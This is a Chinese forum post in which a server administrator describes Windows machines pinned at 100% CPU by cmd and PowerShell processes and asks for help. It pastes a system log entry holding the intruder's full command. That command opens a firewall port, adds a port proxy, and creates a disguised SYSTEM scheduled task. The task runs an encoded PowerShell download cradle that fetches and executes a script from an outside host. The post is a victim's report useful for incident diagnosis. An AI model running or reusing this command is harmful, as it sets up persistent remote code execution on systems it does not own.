近日发现windows07、08、12的CPU总是莫民奇妙的100%,任务管理器中发现了很多cmd.exe和powershell.exe的进程。
通过360杀毒,检测到了powershell异常,并进行了处理。
第二天发现任务管理器中依然很多cmd.exe和powershell.exe的进程,就去检查了任务计划程序,均发现有未知的任务。目前已将未知任务删除。
且打开任务计划程序时都会提示错误:
而后在windows系统日志中发现了如下日志:
服务已安装在系统中。
服务名称: SBAQTNHEGSJXNAGBMXOC
服务文件名: %COMSPEC% /C "netsh.exe firewall add portopening tcp 65530 DNS&netsh interface portproxy add v4tov4 listenport=65530 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""
服务类型: 用户模式服务
服务启动类型: 按需启动
服务帐户: LocalSystem
|
|
|
|
评论
直达楼层